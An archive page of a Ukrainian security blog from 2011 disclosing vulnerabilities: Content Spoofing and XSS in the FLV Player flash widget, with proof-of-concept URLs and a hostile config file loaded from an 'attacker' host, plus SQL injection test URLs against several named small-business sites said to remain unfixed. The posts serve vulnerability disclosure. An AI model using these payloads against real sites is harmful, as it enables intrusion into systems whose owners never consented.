Архів для категорії 'Уразливості'

Content Spoofing та XSS уразливості в FLV Player

23:59 20.08.2011

21.04.2011

У лютому, 24.02.2011, я знайшов Content Spoofing та Cross-Site Scripting уразливості в флеш відео плеері FLV Player. Які я виявив на одному сайті, що використовує даний веб додаток. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

20.08.2011

Content Spoofing:

Флешки плеєра FLV Player приймають довільні адреси в параметрі configxml, що дозволяє підробити вміст флешки - наприклад, вказавши адресу з файлом конфігурації з іншого сайта.

http://site/player_flv.swf?configxml=http://attacker/1.xml
http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml
http://site/player_flv_multi.swf?configxml=http://attacker/1.xml

Флешки плеєра FLV Player приймають довільні адреси в параметрі config, що дозволяє підробити вміст флешки - наприклад, вказавши адресу з файлом конфігурації з іншого сайта.

http://site/player_flv.swf?config=http://attacker/1.txt
http://site/player_flv_maxi.swf?config=http://attacker/1.txt
http://site/player_flv_multi.swf?config=http://attacker/1.txt

Флешки плеєра FLV Player дозволяють підробити всі важливі параметри, в тому числі flv і startimage, і при цьому приймають довільні адреси в параметрах flv і startimage, що дозволяє підробити вміст флешки - наприклад, вказавши адреси відео і зображення з іншого сайта. А для вказання лінки на довільний сайт можна використати параметри onclick і ondoubleclick.

http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_mini.swf?flv=http://attacker/1.flv

XSS:

http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml
http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml

Файл xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>

http://site/player_flv_maxi.swf?config=http://attacker/xss.txt
http://site/player_flv_multi.swf?config=http://attacker/xss.txt

Файл xss.txt:

onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)

Коде виконається після кліка (чи подвійного кліка). Це strictly social XSS.

Уразливі версії MINI, NORMAL, MAXI та MULTI плеєра. Зазначу, що версія NORMAL зустрічається під іменами player_flv.swf і player_flv_classic.swf. Автор FLV Player так і не виправив дані уразливості.

Добірка уразливостей

17:25 20.08.2011

В даній добірці уразливості в веб додатках:

Уразливість на www.mayster.info

23:54 19.08.2011

24.11.2010

У липні, 03.07.2010, я знайшов SQL Injection уразливість на сайті http://www.mayster.info. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

19.08.2011

SQL Injection:

http://www.mayster.info/index.php?content_id=-1%20or%20version()%3E5

Дана уразливість досі не виправлена.

Уразливості в плагінах для WordPress №49

23:52 18.08.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP e-Commerce, eShop та WP-Stats-Dashboard. Для котрих з’явилися експлоіти. WP e-Commerce - це плагін для створення онлайн магазину, eShop - це інший плагін для створення онлайн магазину, WP-Stats-Dashboard - це плагін для виведення статистики з wordpress.com.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

15:37 18.08.2011

В даній добірці уразливості в веб додатках:

  • Hewlett-Packard StorageWorks File Migration Agent Remote Archive Tampering Vulnerability (деталі)
  • Path disclosure in Hycus CMS (деталі)
  • Apache CouchDB Cross Site Scripting Issue (деталі)
  • VirtueMart eCommerce for Joomla <= 1.1.6 Blind SQL Injection (деталі)
  • weechat does not properly use gnutls and allow an attacker to bypass certificate verification (деталі)
  • Drupal Custom Pagers Module XSS (деталі)
  • subversion security update (деталі)
  • Drupal Panels 5.x-1.2 XSS Vulnerability (деталі)
  • proftpd-dfsg security update (деталі)
  • Path disclosure in Redaxscript (деталі)

Уразливості на svpellets.com

23:59 17.08.2011

23.11.2010

У липні, 03.07.2010, я знайшов SQL Injection та Cross-Site Scripting уразливості на сайті http://svpellets.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

17.08.2011

SQL Injection:

http://svpellets.com/index.php?content_id=-1%20or%20version()%3E4

XSS:

Дані уразливості досі не виправлені.

Уразливість на www.polirovkakamnya.com.ua

23:55 16.08.2011

20.11.2010

У липні, 03.07.2010, я знайшов SQL Injection уразливість на сайті http://www.polirovkakamnya.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.08.2011

SQL Injection:

http://www.polirovkakamnya.com.ua/index.php?content_id=-1%20or%20version()%3E4

Зараз даний сайт не працює. І таким чином власник ресурсу вирішив проблему з цією та іншими уразливостями в цьому движку.

Добірка уразливостей

15:20 16.08.2011

В даній добірці уразливості в веб додатках:

  • Multiple Vulnerabilities in Cisco TelePresence Manager (деталі)
  • Lomtec ActiveWeb Professional 3.0 CMS Allows Arbitrary File Upload and Execution as SYSTEM in ColdFusion (деталі)
  • Multiple Vulnerabilities in Cisco TelePresence Multipoint Switch (деталі)
  • Multiple Web Applications | Full Path Disclosure (деталі)
  • Multiple Vulnerabilities in Cisco TelePresence Multipoint Switch (деталі)
  • Vanilla Forums 2.0.16 <= Cross Site Scripting Vulnerability (деталі)
  • Multiple Vulnerabilities in Cisco TelePresence Recording Server (деталі)
  • Path disclousure in BLOG:CMS (деталі)
  • Multiple Vulnerabilities in Cisco TelePresence Endpoint Devices (деталі)
  • Path disclousure in DBHcms (деталі)

Уразливість на vyshivka.net.ua

23:51 15.08.2011

18.11.2010

У липні, 03.07.2010, я знайшов SQL Injection уразливість на сайті http://vyshivka.net.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

15.08.2011

SQL Injection:

http://vyshivka.net.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

Добірка уразливостей

18:20 06.08.2011

В даній добірці уразливості в веб додатках:

  • Linksys Cisco Wag120N CSRF Vulnerability (деталі)
  • Path disclousure in Pivotx (деталі)
  • Path disclousure in Pligg CMS (деталі)
  • HP Web Jetadmin Running on Windows, Local Unauthorized Access to Managed Resources (деталі)
  • phpMyAdmin 3.4.x, 3.4.0 beta 2 <= Stored Cross Site Scripting (XSS) Vulnerability (деталі)
  • Cisco Firewall Services Module Skinny Client Control Protocol Inspection Denial of Service Vulnerability (деталі)
  • PRTG V8.1.2.1809 XSS Bugs in login.htm and error.htm (деталі)
  • Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances (деталі)
  • XSRF (CSRF) in KaiBB (деталі)
  • vsftpd 2.3.2 remote denial-of-service (деталі)